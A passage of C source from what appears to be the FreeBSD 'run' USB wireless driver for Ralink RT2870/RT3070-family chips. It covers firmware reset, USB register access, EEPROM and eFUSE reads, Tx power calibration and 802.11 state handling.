USETW(req.wValue, 8); USETW(req.wIndex, 0); USETW(req.wLength, 0); if ((error = usbd_do_request(sc->sc_udev, &sc->sc_mtx, &req, NULL)) != 0) { device_printf(sc->sc_dev, "firmware reset failed\n"); goto fail; } run_delay(sc, 10); run_write(sc, RT2860_H2M_BBPAGENT, 0); run_write(sc, RT2860_H2M_MAILBOX, 0); run_write(sc, RT2860_H2M_INTSRC, 0); if ((error = run_mcu_cmd(sc, RT2860_MCU_CMD_RFRESET, 0)) != 0) goto fail; /* wait until microcontroller is ready */ for (ntries = 0; ntries < 1000; ntries++) { if ((error = run_read(sc, RT2860_SYS_CTRL, &tmp)) != 0) goto fail; if (tmp & RT2860_MCU_READY) break; run_delay(sc, 10); } if (ntries == 1000) { device_printf(sc->sc_dev, "timeout waiting for MCU to initialize\n"); error = ETIMEDOUT; goto fail; } device_printf(sc->sc_dev, "firmware %s ver. %u.%u loaded\n", (base == fw->data) ? "RT2870" : "RT3071", *(base + 4092), *(base + 4093)); fail: firmware_put(fw, FIRMWARE_UNLOAD); return (error); } static int run_reset(struct run_softc *sc) { usb_device_request_t req; req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = RT2870_RESET; USETW(req.wValue, 1); USETW(req.wIndex, 0); USETW(req.wLength, 0); return (usbd_do_request(sc->sc_udev, &sc->sc_mtx, &req, NULL)); } static usb_error_t run_do_request(struct run_softc *sc, struct usb_device_request *req, void *data) { usb_error_t err; int ntries = 10; RUN_LOCK_ASSERT(sc, MA_OWNED); while (ntries--) { err = usbd_do_request_flags(sc->sc_udev, &sc->sc_mtx, req, data, 0, NULL, 250 /* ms */); if (err == 0) break; DPRINTFN(1, "Control request failed, %s (retrying)\n", usbd_errstr(err)); run_delay(sc, 10); } return (err); } static int run_read(struct run_softc *sc, uint16_t reg, uint32_t *val) { uint32_t tmp; int error; error = run_read_region_1(sc, reg, (uint8_t *)&tmp, sizeof tmp); if (error == 0) *val = le32toh(tmp); else *val = 0xffffffff; return (error); } static int run_read_region_1(struct run_softc *sc, uint16_t reg, uint8_t *buf, int len) { usb_device_request_t req; req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = RT2870_READ_REGION_1; USETW(req.wValue, 0); USETW(req.wIndex, reg); USETW(req.wLength, len); return (run_do_request(sc, &req, buf)); } static int run_write_2(struct run_softc *sc, uint16_t reg, uint16_t val) { usb_device_request_t req; req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = RT2870_WRITE_2; USETW(req.wValue, val); USETW(req.wIndex, reg); USETW(req.wLength, 0); return (run_do_request(sc, &req, NULL)); } static int run_write(struct run_softc *sc, uint16_t reg, uint32_t val) { int error; if ((error = run_write_2(sc, reg, val & 0xffff)) == 0) error = run_write_2(sc, reg + 2, val >> 16); return (error); } static int run_write_region_1(struct run_softc *sc, uint16_t reg, const uint8_t *buf, int len) { #if 1 int i, error = 0; /* * NB: the WRITE_REGION_1 command is not stable on RT2860. * We thus issue multiple WRITE_2 commands instead. */ KASSERT((len & 1) == 0, ("run_write_region_1: Data too long.\n")); for (i = 0; i < len && error == 0; i += 2) error = run_write_2(sc, reg + i, buf[i] | buf[i + 1] << 8); return (error); #else usb_device_request_t req; int error = 0; /* * NOTE: It appears the WRITE_REGION_1 command cannot be * passed a huge amount of data, which will crash the * firmware. Limit amount of data passed to 64-bytes at a * time. */ while (len > 0) { int delta = 64; if (delta > len) delta = len; req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = RT2870_WRITE_REGION_1; USETW(req.wValue, 0); USETW(req.wIndex, reg); USETW(req.wLength, delta); error = run_do_request(sc, &req, __DECONST(uint8_t *, buf)); if (error != 0) break; reg += delta; buf += delta; len -= delta; } return (error); #endif } static int run_set_region_4(struct run_softc *sc, uint16_t reg, uint32_t val, int len) { int i, error = 0; KASSERT((len & 3) == 0, ("run_set_region_4: Invalid data length.\n")); for (i = 0; i < len && error == 0; i += 4) error = run_write(sc, reg + i, val); return (error); } static int run_rf3593_efuse_read_1(struct run_softc *sc, uint16_t addr, uint16_t *val) { return (run_efuse_read(sc, addr * 2, val, 1)); } static int run_efuse_read(struct run_softc *sc, uint16_t addr, uint16_t *val, int count) { uint32_t tmp; uint16_t reg; int error, ntries; if ((error = run_read(sc, RT3070_EFUSE_CTRL, &tmp)) != 0) return (error); if (count == 2) addr *= 2; /*- * Read one 16-byte block into registers EFUSE_DATA[0-3]: * DATA0: F E D C * DATA1: B A 9 8 * DATA2: 7 6 5 4 * DATA3: 3 2 1 0 */ tmp &= ~(RT3070_EFSROM_MODE_MASK | RT3070_EFSROM_AIN_MASK); tmp |= (addr & ~0xf) << RT3070_EFSROM_AIN_SHIFT | RT3070_EFSROM_KICK; run_write(sc, RT3070_EFUSE_CTRL, tmp); for (ntries = 0; ntries < 100; ntries++) { if ((error = run_read(sc, RT3070_EFUSE_CTRL, &tmp)) != 0) return (error); if (!(tmp & RT3070_EFSROM_KICK)) break; run_delay(sc, 2); } if (ntries == 100) return (ETIMEDOUT); if ((tmp & RT3070_EFUSE_AOUT_MASK) == RT3070_EFUSE_AOUT_MASK) { *val = 0xffff; /* address not found */ return (0); } /* determine to which 32-bit register our 16-bit word belongs */ reg = RT3070_EFUSE_DATA3 - (addr & 0xc); if ((error = run_read(sc, reg, &tmp)) != 0) return (error); if (count == 2) *val = (addr & 2) ? tmp >> 16 : tmp & 0xffff; else { tmp >>= (8 *(addr & 0x3)); memmove(val, &tmp, sizeof(*val)); } return (0); } /* Read 16-bit from eFUSE ROM (RT3070 only.) */ static int run_efuse_read_2(struct run_softc *sc, uint16_t addr, uint16_t *val) { return (run_efuse_read(sc, addr, val, 2)); } static int run_eeprom_read_2(struct run_softc *sc, uint16_t addr, uint16_t *val) { usb_device_request_t req; uint16_t tmp; int error; addr *= 2; req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = RT2870_EEPROM_READ; USETW(req.wValue, 0); USETW(req.wIndex, addr); USETW(req.wLength, sizeof(tmp)); error = usbd_do_request(sc->sc_udev, &sc->sc_mtx, &req, &tmp); if (error == 0) *val = le16toh(tmp); else *val = 0xffff; return (error); } static __inline int run_srom_read(struct run_softc *sc, uint16_t addr, uint16_t *val) { /* either eFUSE ROM or EEPROM */ return sc->sc_srom_read(sc, addr, val); } static int run_rt2870_rf_write(struct run_softc *sc, uint32_t val) { uint32_t tmp; int error, ntries; for (ntries = 0; ntries < 10; ntries++) { if ((error = run_read(sc, RT2860_RF_CSR_CFG0, &tmp)) != 0) return (error); if (!(tmp & RT2860_RF_REG_CTRL)) break; } if (ntries == 10) return (ETIMEDOUT); return (run_write(sc, RT2860_RF_CSR_CFG0, val)); } static int run_rt3070_rf_read(struct run_softc *sc, uint8_t reg, uint8_t *val) { uint32_t tmp; int error, ntries; for (ntries = 0; ntries < 100; ntries++) { if ((error = run_read(sc, RT3070_RF_CSR_CFG, &tmp)) != 0) return (error); if (!(tmp & RT3070_RF_KICK)) break; } if (ntries == 100) return (ETIMEDOUT); tmp = RT3070_RF_KICK | reg << 8; if ((error = run_write(sc, RT3070_RF_CSR_CFG, tmp)) != 0) return (error); for (ntries = 0; ntries < 100; ntries++) { if ((error = run_read(sc, RT3070_RF_CSR_CFG, &tmp)) != 0) return (error); if (!(tmp & RT3070_RF_KICK)) break; } if (ntries == 100) return (ETIMEDOUT); *val = tmp & 0xff; return (0); } static int run_rt3070_rf_write(struct run_softc *sc, uint8_t reg, uint8_t val) { uint32_t tmp; int error, ntries; for (ntries = 0; ntries < 10; ntries++) { if ((error = run_read(sc, RT3070_RF_CSR_CFG, &tmp)) != 0) return (error); if (!(tmp & RT3070_RF_KICK)) break; } if (ntries == 10) return (ETIMEDOUT); tmp = RT3070_RF_WRITE | RT3070_RF_KICK | reg << 8 | val; return (run_write(sc, RT3070_RF_CSR_CFG, tmp)); } static int run_bbp_read(struct run_softc *sc, uint8_t reg, uint8_t *val) { uint32_t tmp; int ntries, error; for (ntries = 0; ntries < 10; ntries++) { if ((error = run_read(sc, RT2860_BBP_CSR_CFG, &tmp)) != 0) return (error); if (!(tmp & RT2860_BBP_CSR_KICK)) break; } if (ntries == 10) return (ETIMEDOUT); tmp = RT2860_BBP_CSR_READ | RT2860_BBP_CSR_KICK | reg << 8; if ((error = run_write(sc, RT2860_BBP_CSR_CFG, tmp)) != 0) return (error); for (ntries = 0; ntries < 10; ntries++) { if ((error = run_read(sc, RT2860_BBP_CSR_CFG, &tmp)) != 0) return (error); if (!(tmp & RT2860_BBP_CSR_KICK)) break; } if (ntries == 10) return (ETIMEDOUT); *val = tmp & 0xff; return (0); } static int run_bbp_write(struct run_softc *sc, uint8_t reg, uint8_t val) { uint32_t tmp; int ntries, error; for (ntries = 0; ntries < 10; ntries++) { if ((error = run_read(sc, RT2860_BBP_CSR_CFG, &tmp)) != 0) return (error); if (!(tmp & RT2860_BBP_CSR_KICK)) break; } if (ntries == 10) return (ETIMEDOUT); tmp = RT2860_BBP_CSR_KICK | reg << 8 | val; return (run_write(sc, RT2860_BBP_CSR_CFG, tmp)); } /* * Send a command to the 8051 microcontroller unit. */ static int run_mcu_cmd(struct run_softc *sc, uint8_t cmd, uint16_t arg) { uint32_t tmp; int error, ntries; for (ntries = 0; ntries < 100; ntries++) { if ((error = run_read(sc, RT2860_H2M_MAILBOX, &tmp)) != 0) return error; if (!(tmp & RT2860_H2M_BUSY)) break; } if (ntries == 100) return ETIMEDOUT; tmp = RT2860_H2M_BUSY | RT2860_TOKEN_NO_INTR << 16 | arg; if ((error = run_write(sc, RT2860_H2M_MAILBOX, tmp)) == 0) error = run_write(sc, RT2860_HOST_CMD, cmd); return (error); } /* * Add `delta' (signed) to each 4-bit sub-word of a 32-bit word. * Used to adjust per-rate Tx power registers. */ static __inline uint32_t b4inc(uint32_t b32, int8_t delta) { int8_t i, b4; for (i = 0; i < 8; i++) { b4 = b32 & 0xf; b4 += delta; if (b4 < 0) b4 = 0; else if (b4 > 0xf) b4 = 0xf; b32 = b32 >> 4 | b4 << 28; } return (b32); } static const char * run_get_rf(uint16_t rev) { switch (rev) { case RT2860_RF_2820: return "RT2820"; case RT2860_RF_2850: return "RT2850"; case RT2860_RF_2720: return "RT2720"; case RT2860_RF_2750: return "RT2750"; case RT3070_RF_3020: return "RT3020"; case RT3070_RF_2020: return "RT2020"; case RT3070_RF_3021: return "RT3021"; case RT3070_RF_3022: return "RT3022"; case RT3070_RF_3052: return "RT3052"; case RT3593_RF_3053: return "RT3053"; case RT5592_RF_5592: return "RT5592"; case RT5390_RF_5370: return "RT5370"; case RT5390_RF_5372: return "RT5372"; } return ("unknown"); } static void run_rt3593_get_txpower(struct run_softc *sc) { uint16_t addr, val; int i; /* Read power settings for 2GHz channels. */ for (i = 0; i < 14; i += 2) { addr = (sc->ntxchains == 3) ? RT3593_EEPROM_PWR2GHZ_BASE1 : RT2860_EEPROM_PWR2GHZ_BASE1; run_srom_read(sc, addr + i / 2, &val); sc->txpow1[i + 0] = (int8_t)(val & 0xff); sc->txpow1[i + 1] = (int8_t)(val >> 8); addr = (sc->ntxchains == 3) ? RT3593_EEPROM_PWR2GHZ_BASE2 : RT2860_EEPROM_PWR2GHZ_BASE2; run_srom_read(sc, addr + i / 2, &val); sc->txpow2[i + 0] = (int8_t)(val & 0xff); sc->txpow2[i + 1] = (int8_t)(val >> 8); if (sc->ntxchains == 3) { run_srom_read(sc, RT3593_EEPROM_PWR2GHZ_BASE3 + i / 2, &val); sc->txpow3[i + 0] = (int8_t)(val & 0xff); sc->txpow3[i + 1] = (int8_t)(val >> 8); } } /* Fix broken Tx power entries. */ for (i = 0; i < 14; i++) { if ((sc->txpow1[i] & 0x1f) > 31) sc->txpow1[i] = 5; if ((sc->txpow2[i] & 0x1f) > 31) sc->txpow2[i] = 5; if (sc->ntxchains == 3) { if ((sc->txpow3[i] & 0x1f) > 31) sc->txpow3[i] = 5; } } /* Read power settings for 5GHz channels. */ for (i = 0; i < 40; i += 2) { run_srom_read(sc, RT3593_EEPROM_PWR5GHZ_BASE1 + i / 2, &val); sc->txpow1[i + 14] = (int8_t)(val & 0xff); sc->txpow1[i + 15] = (int8_t)(val >> 8); run_srom_read(sc, RT3593_EEPROM_PWR5GHZ_BASE2 + i / 2, &val); sc->txpow2[i + 14] = (int8_t)(val & 0xff); sc->txpow2[i + 15] = (int8_t)(val >> 8); if (sc->ntxchains == 3) { run_srom_read(sc, RT3593_EEPROM_PWR5GHZ_BASE3 + i / 2, &val); sc->txpow3[i + 14] = (int8_t)(val & 0xff); sc->txpow3[i + 15] = (int8_t)(val >> 8); } } } static void run_get_txpower(struct run_softc *sc) { uint16_t val; int i; /* Read power settings for 2GHz channels. */ for (i = 0; i < 14; i += 2) { run_srom_read(sc, RT2860_EEPROM_PWR2GHZ_BASE1 + i / 2, &val); sc->txpow1[i + 0] = (int8_t)(val & 0xff); sc->txpow1[i + 1] = (int8_t)(val >> 8); if (sc->mac_ver != 0x5390) { run_srom_read(sc, RT2860_EEPROM_PWR2GHZ_BASE2 + i / 2, &val); sc->txpow2[i + 0] = (int8_t)(val & 0xff); sc->txpow2[i + 1] = (int8_t)(val >> 8); } } /* Fix broken Tx power entries. */ for (i = 0; i < 14; i++) { if (sc->mac_ver >= 0x5390) { if (sc->txpow1[i] < 0 || sc->txpow1[i] > 27) sc->txpow1[i] = 5; } else { if (sc->txpow1[i] < 0 || sc->txpow1[i] > 31) sc->txpow1[i] = 5; } if (sc->mac_ver > 0x5390) { if (sc->txpow2[i] < 0 || sc->txpow2[i] > 27) sc->txpow2[i] = 5; } else if (sc->mac_ver < 0x5390) { if (sc->txpow2[i] < 0 || sc->txpow2[i] > 31) sc->txpow2[i] = 5; } DPRINTF("chan %d: power1=%d, power2=%d\n", rt2860_rf2850[i].chan, sc->txpow1[i], sc->txpow2[i]); } /* Read power settings for 5GHz channels. */ for (i = 0; i < 40; i += 2) { run_srom_read(sc, RT2860_EEPROM_PWR5GHZ_BASE1 + i / 2, &val); sc->txpow1[i + 14] = (int8_t)(val & 0xff); sc->txpow1[i + 15] = (int8_t)(val >> 8); run_srom_read(sc, RT2860_EEPROM_PWR5GHZ_BASE2 + i / 2, &val); sc->txpow2[i + 14] = (int8_t)(val & 0xff); sc->txpow2[i + 15] = (int8_t)(val >> 8); } /* Fix broken Tx power entries. */ for (i = 0; i < 40; i++ ) { if (sc->mac_ver != 0x5592) { if (sc->txpow1[14 + i] < -7 || sc->txpow1[14 + i] > 15) sc->txpow1[14 + i] = 5; if (sc->txpow2[14 + i] < -7 || sc->txpow2[14 + i] > 15) sc->txpow2[14 + i] = 5; } DPRINTF("chan %d: power1=%d, power2=%d\n", rt2860_rf2850[14 + i].chan, sc->txpow1[14 + i], sc->txpow2[14 + i]); } } static int run_read_eeprom(struct run_softc *sc) { int8_t delta_2ghz, delta_5ghz; uint32_t tmp; uint16_t val; int ridx, ant, i; /* check whether the ROM is eFUSE ROM or EEPROM */ sc->sc_srom_read = run_eeprom_read_2; if (sc->mac_ver >= 0x3070) { run_read(sc, RT3070_EFUSE_CTRL, &tmp); DPRINTF("EFUSE_CTRL=0x%08x\n", tmp); if ((tmp & RT3070_SEL_EFUSE) && sc->mac_ver != 0x3593) sc->sc_srom_read = run_efuse_read_2; else sc->sc_srom_read = run_rf3593_efuse_read_1; } /* read ROM version */ run_srom_read(sc, RT2860_EEPROM_VERSION, &val); DPRINTF("EEPROM rev=%d, FAE=%d\n", val & 0xff, val >> 8); /* read MAC address */ run_srom_read(sc, RT2860_EEPROM_MAC01, &val); sc->sc_bssid[0] = val & 0xff; sc->sc_bssid[1] = val >> 8; run_srom_read(sc, RT2860_EEPROM_MAC23, &val); sc->sc_bssid[2] = val & 0xff; sc->sc_bssid[3] = val >> 8; run_srom_read(sc, RT2860_EEPROM_MAC45, &val); sc->sc_bssid[4] = val & 0xff; sc->sc_bssid[5] = val >> 8; if (sc->mac_ver < 0x3593) { /* read vender BBP settings */ for (i = 0; i < 10; i++) { run_srom_read(sc, RT2860_EEPROM_BBP_BASE + i, &val); sc->bbp[i].val = val & 0xff; sc->bbp[i].reg = val >> 8; DPRINTF("BBP%d=0x%02x\n", sc->bbp[i].reg, sc->bbp[i].val); } if (sc->mac_ver >= 0x3071) { /* read vendor RF settings */ for (i = 0; i < 10; i++) { run_srom_read(sc, RT3071_EEPROM_RF_BASE + i, &val); sc->rf[i].val = val & 0xff; sc->rf[i].reg = val >> 8; DPRINTF("RF%d=0x%02x\n", sc->rf[i].reg, sc->rf[i].val); } } } /* read RF frequency offset from EEPROM */ run_srom_read(sc, (sc->mac_ver != 0x3593) ? RT2860_EEPROM_FREQ_LEDS : RT3593_EEPROM_FREQ, &val); sc->freq = ((val & 0xff) != 0xff) ? val & 0xff : 0; DPRINTF("EEPROM freq offset %d\n", sc->freq & 0xff); run_srom_read(sc, (sc->mac_ver != 0x3593) ? RT2860_EEPROM_FREQ_LEDS : RT3593_EEPROM_FREQ_LEDS, &val); if (val >> 8 != 0xff) { /* read LEDs operating mode */ sc->leds = val >> 8; run_srom_read(sc, (sc->mac_ver != 0x3593) ? RT2860_EEPROM_LED1 : RT3593_EEPROM_LED1, &sc->led[0]); run_srom_read(sc, (sc->mac_ver != 0x3593) ? RT2860_EEPROM_LED2 : RT3593_EEPROM_LED2, &sc->led[1]); run_srom_read(sc, (sc->mac_ver != 0x3593) ? RT2860_EEPROM_LED3 : RT3593_EEPROM_LED3, &sc->led[2]); } else { /* broken EEPROM, use default settings */ sc->leds = 0x01; sc->led[0] = 0x5555; sc->led[1] = 0x2221; sc->led[2] = 0x5627; /* differs from RT2860 */ } DPRINTF("EEPROM LED mode=0x%02x, LEDs=0x%04x/0x%04x/0x%04x\n", sc->leds, sc->led[0], sc->led[1], sc->led[2]); /* read RF information */ if (sc->mac_ver == 0x5390 || sc->mac_ver ==0x5392) run_srom_read(sc, 0x00, &val); else run_srom_read(sc, RT2860_EEPROM_ANTENNA, &val); if (val == 0xffff) { device_printf(sc->sc_dev, "invalid EEPROM antenna info, using default\n"); DPRINTF("invalid EEPROM antenna info, using default\n"); if (sc->mac_ver == 0x3572) { /* default to RF3052 2T2R */ sc->rf_rev = RT3070_RF_3052; sc->ntxchains = 2; sc->nrxchains = 2; } else if (sc->mac_ver >= 0x3070) { /* default to RF3020 1T1R */ sc->rf_rev = RT3070_RF_3020; sc->ntxchains = 1; sc->nrxchains = 1; } else { /* default to RF2820 1T2R */ sc->rf_rev = RT2860_RF_2820; sc->ntxchains = 1; sc->nrxchains = 2; } } else { if (sc->mac_ver == 0x5390 || sc->mac_ver ==0x5392) { sc->rf_rev = val; run_srom_read(sc, RT2860_EEPROM_ANTENNA, &val); } else sc->rf_rev = (val >> 8) & 0xf; sc->ntxchains = (val >> 4) & 0xf; sc->nrxchains = val & 0xf; } DPRINTF("EEPROM RF rev=0x%04x chains=%dT%dR\n", sc->rf_rev, sc->ntxchains, sc->nrxchains); /* check if RF supports automatic Tx access gain control */ run_srom_read(sc, RT2860_EEPROM_CONFIG, &val); DPRINTF("EEPROM CFG 0x%04x\n", val); /* check if driver should patch the DAC issue */ if ((val >> 8) != 0xff) sc->patch_dac = (val >> 15) & 1; if ((val & 0xff) != 0xff) { sc->ext_5ghz_lna = (val >> 3) & 1; sc->ext_2ghz_lna = (val >> 2) & 1; /* check if RF supports automatic Tx access gain control */ sc->calib_2ghz = sc->calib_5ghz = (val >> 1) & 1; /* check if we have a hardware radio switch */ sc->rfswitch = val & 1; } /* Read Tx power settings. */ if (sc->mac_ver == 0x3593) run_rt3593_get_txpower(sc); else run_get_txpower(sc); /* read Tx power compensation for each Tx rate */ run_srom_read(sc, RT2860_EEPROM_DELTAPWR, &val); delta_2ghz = delta_5ghz = 0; if ((val & 0xff) != 0xff && (val & 0x80)) { delta_2ghz = val & 0xf; if (!(val & 0x40)) /* negative number */ delta_2ghz = -delta_2ghz; } val >>= 8; if ((val & 0xff) != 0xff && (val & 0x80)) { delta_5ghz = val & 0xf; if (!(val & 0x40)) /* negative number */ delta_5ghz = -delta_5ghz; } DPRINTF("power compensation=%d (2GHz), %d (5GHz)\n", delta_2ghz, delta_5ghz); for (ridx = 0; ridx < 5; ridx++) { uint32_t reg; run_srom_read(sc, RT2860_EEPROM_RPWR + ridx * 2, &val); reg = val; run_srom_read(sc, RT2860_EEPROM_RPWR + ridx * 2 + 1, &val); reg |= (uint32_t)val << 16; sc->txpow20mhz[ridx] = reg; sc->txpow40mhz_2ghz[ridx] = b4inc(reg, delta_2ghz); sc->txpow40mhz_5ghz[ridx] = b4inc(reg, delta_5ghz); DPRINTF("ridx %d: power 20MHz=0x%08x, 40MHz/2GHz=0x%08x, " "40MHz/5GHz=0x%08x\n", ridx, sc->txpow20mhz[ridx], sc->txpow40mhz_2ghz[ridx], sc->txpow40mhz_5ghz[ridx]); } /* Read RSSI offsets and LNA gains from EEPROM. */ run_srom_read(sc, (sc->mac_ver != 0x3593) ? RT2860_EEPROM_RSSI1_2GHZ : RT3593_EEPROM_RSSI1_2GHZ, &val); sc->rssi_2ghz[0] = val & 0xff; /* Ant A */ sc->rssi_2ghz[1] = val >> 8; /* Ant B */ run_srom_read(sc, (sc->mac_ver != 0x3593) ? RT2860_EEPROM_RSSI2_2GHZ : RT3593_EEPROM_RSSI2_2GHZ, &val); if (sc->mac_ver >= 0x3070) { if (sc->mac_ver == 0x3593) { sc->txmixgain_2ghz = 0; sc->rssi_2ghz[2] = val & 0xff; /* Ant C */ } else { /* * On RT3070 chips (limited to 2 Rx chains), this ROM * field contains the Tx mixer gain for the 2GHz band. */ if ((val & 0xff) != 0xff) sc->txmixgain_2ghz = val & 0x7; } DPRINTF("tx mixer gain=%u (2GHz)\n", sc->txmixgain_2ghz); } else sc->rssi_2ghz[2] = val & 0xff; /* Ant C */ if (sc->mac_ver == 0x3593) run_srom_read(sc, RT3593_EEPROM_LNA_5GHZ, &val); sc->lna[2] = val >> 8; /* channel group 2 */ run_srom_read(sc, (sc->mac_ver != 0x3593) ? RT2860_EEPROM_RSSI1_5GHZ : RT3593_EEPROM_RSSI1_5GHZ, &val); sc->rssi_5ghz[0] = val & 0xff; /* Ant A */ sc->rssi_5ghz[1] = val >> 8; /* Ant B */ run_srom_read(sc, (sc->mac_ver != 0x3593) ? RT2860_EEPROM_RSSI2_5GHZ : RT3593_EEPROM_RSSI2_5GHZ, &val); if (sc->mac_ver == 0x3572) { /* * On RT3572 chips (limited to 2 Rx chains), this ROM * field contains the Tx mixer gain for the 5GHz band. */ if ((val & 0xff) != 0xff) sc->txmixgain_5ghz = val & 0x7; DPRINTF("tx mixer gain=%u (5GHz)\n", sc->txmixgain_5ghz); } else sc->rssi_5ghz[2] = val & 0xff; /* Ant C */ if (sc->mac_ver == 0x3593) { sc->txmixgain_5ghz = 0; run_srom_read(sc, RT3593_EEPROM_LNA_5GHZ, &val); } sc->lna[3] = val >> 8; /* channel group 3 */ run_srom_read(sc, (sc->mac_ver != 0x3593) ? RT2860_EEPROM_LNA : RT3593_EEPROM_LNA, &val); sc->lna[0] = val & 0xff; /* channel group 0 */ sc->lna[1] = val >> 8; /* channel group 1 */ /* fix broken 5GHz LNA entries */ if (sc->lna[2] == 0 || sc->lna[2] == 0xff) { DPRINTF("invalid LNA for channel group %d\n", 2); sc->lna[2] = sc->lna[1]; } if (sc->lna[3] == 0 || sc->lna[3] == 0xff) { DPRINTF("invalid LNA for channel group %d\n", 3); sc->lna[3] = sc->lna[1]; } /* fix broken RSSI offset entries */ for (ant = 0; ant < 3; ant++) { if (sc->rssi_2ghz[ant] < -10 || sc->rssi_2ghz[ant] > 10) { DPRINTF("invalid RSSI%d offset: %d (2GHz)\n", ant + 1, sc->rssi_2ghz[ant]); sc->rssi_2ghz[ant] = 0; } if (sc->rssi_5ghz[ant] < -10 || sc->rssi_5ghz[ant] > 10) { DPRINTF("invalid RSSI%d offset: %d (5GHz)\n", ant + 1, sc->rssi_5ghz[ant]); sc->rssi_5ghz[ant] = 0; } } return (0); } static struct ieee80211_node * run_node_alloc(struct ieee80211vap *vap, const uint8_t mac[IEEE80211_ADDR_LEN]) { return malloc(sizeof (struct run_node), M_DEVBUF, M_NOWAIT | M_ZERO); } static int run_media_change(struct ifnet *ifp) { struct ieee80211vap *vap = ifp->if_softc; struct ieee80211com *ic = vap->iv_ic; const struct ieee80211_txparam *tp; struct run_softc *sc = ic->ic_ifp->if_softc; uint8_t rate, ridx; int error; RUN_LOCK(sc); error = ieee80211_media_change(ifp); if (error != ENETRESET) { RUN_UNLOCK(sc); return (error); } tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)]; if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) { struct ieee80211_node *ni; struct run_node *rn; rate = ic->ic_sup_rates[ic->ic_curmode]. rs_rates[tp->ucastrate] & IEEE80211_RATE_VAL; for (ridx = 0; ridx < RT2860_RIDX_MAX; ridx++) if (rt2860_rates[ridx].rate == rate) break; ni = ieee80211_ref_node(vap->iv_bss); rn = (struct run_node *)ni; rn->fix_ridx = ridx; DPRINTF("rate=%d, fix_ridx=%d\n", rate, rn->fix_ridx); ieee80211_free_node(ni); } #if 0 if ((ifp->if_flags & IFF_UP) && (ifp->if_drv_flags & IFF_DRV_RUNNING)){ run_init_locked(sc); } #endif RUN_UNLOCK(sc); return (0); } static int run_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { const struct ieee80211_txparam *tp; struct ieee80211com *ic = vap->iv_ic; struct run_softc *sc = ic->ic_ifp->if_softc; struct run_vap *rvp = RUN_VAP(vap); enum ieee80211_state ostate; uint32_t sta[3]; uint32_t tmp; uint8_t ratectl; uint8_t restart_ratectl = 0; uint8_t bid = 1 << rvp->rvp_id; ostate = vap->iv_state; DPRINTF("%s -> %s\n", ieee80211_state_name[ostate], ieee80211_state_name[nstate]); IEEE80211_UNLOCK(ic); RUN_LOCK(sc); ratectl = sc->ratectl_run; /* remember current state */ sc->ratectl_run = RUN_RATECTL_OFF; usb_callout_stop(&sc->ratectl_ch); if (ostate == IEEE80211_S_RUN) { /* turn link LED off */ run_set_leds(sc, RT2860_LED_RADIO); } switch (nstate) { case IEEE80211_S_INIT: restart_ratectl = 1; if (ostate != IEEE80211_S_RUN) break; ratectl &= ~bid; sc->runbmap &= ~bid; /* abort TSF synchronization if there is no vap running */ if (--sc->running == 0) { run_read(sc, RT2860_BCN_TIME_CFG, &tmp); run_write(sc, RT2860_BCN_TIME_CFG, tmp & ~(RT2860_BCN_TX_EN | RT2860_TSF_TIMER_EN | RT2860_TBTT_TIMER_EN)); } break; case IEEE80211_S_RUN: if (!(sc->runbmap & bid)) { if(sc->running++) restart_ratectl = 1; sc->runbmap |= bid; } m_freem(rvp->beacon_mbuf); rvp->beacon_mbuf = NULL; switch (vap->iv_opmode) { case IEEE80211_M_HOSTAP: case IEEE80211_M_MBSS: sc->ap_running |= bid; ic->ic_opmode = vap->iv_opmode; run_update_beacon_cb(vap); break; case IEEE80211_M_IBSS: sc->adhoc_running |= bid; if (!sc->ap_running) ic->ic_opmode = vap->iv_opmode; run_update_beacon_cb(vap); break; case IEEE80211_M_STA: sc->sta_running |= bid; if (!sc->ap_running && !sc->adhoc_running) ic->ic_opmode = vap->iv_opmode; /* read statistic counters (clear on read) */ run_read_region_1(sc, RT2860_TX_STA_CNT0, (uint8_t *)sta, sizeof sta); break; default: ic->ic_opmode = vap->iv_opmode; break; } if (vap->iv_opmode != IEEE80211_M_MONITOR) { struct ieee80211_node *ni; if (ic->ic_bsschan == IEEE80211_CHAN_ANYC) { RUN_UNLOCK(sc); IEEE80211_LOCK(ic); return (-1); } run_updateslot(ic->ic_ifp); run_enable_mrr(sc); run_set_txpreamble(sc); run_set_basicrates(sc); ni = ieee80211_ref_node(vap->iv_bss); IEEE80211_ADDR_COPY(sc->sc_bssid, ni->ni_bssid); run_set_bssid(sc, ni->ni_bssid); ieee80211_free_node(ni); run_enable_tsf_sync(sc); /* enable automatic rate adaptation */ tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)]; if (tp->ucastrate == IEEE80211_FIXED_RATE_NONE) ratectl |= bid; } /* turn link LED on */ run_set_leds(sc, RT2860_LED_RADIO | (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan) ? RT2860_LED_LINK_2GHZ : RT2860_LED_LINK_5GHZ)); break; default: DPRINTFN(6, "undefined case\n"); break; } /* restart amrr for running VAPs */ if ((sc->ratectl_run = ratectl) && restart_ratectl) usb_callout_reset(&sc->ratectl_ch, hz, run_ratectl_to, sc); RUN_UNLOCK(sc); IEEE80211_LOCK(ic); return(rvp->newstate(vap, nstate, arg)); } /* ARGSUSED */ static void run_wme_update_cb(void *arg) { struct ieee80211com *ic = arg; struct run_softc *sc = ic->ic_ifp->if_softc; struct ieee80211_wme_state *wmesp = &ic->ic_wme; int aci, error = 0; RUN_LOCK_ASSERT(sc, MA_OWNED); /* update MAC TX configuration registers */ for (aci = 0; aci < WME_NUM_AC; aci++) { error = run_write(sc, RT2860_EDCA_AC_CFG(aci), wmesp->wme_params[aci].wmep_logcwmax << 16 | wmesp->wme_params[aci].wmep_logcwmin << 12 | wmesp->wme_params[aci].wmep_aifsn << 8 | wmesp->wme_params[aci].wmep_txopLimit); if (error) goto err; } /* update SCH/DMA registers too */ error = run_write(sc, RT2860_WMM_AIFSN_CFG, wmesp->wme_params[WME_AC_VO].wmep_aifsn << 12 | wmesp->wme_params[WME_AC_VI].wmep_aifsn << 8 | wmesp->wme_params[WME_AC_BK].wmep_aifsn << 4 | wmesp->wme_params[WME_AC_BE].wmep_aifsn); if (error) goto err; error = run_write(sc, RT2860_WMM_CWMIN_CFG, 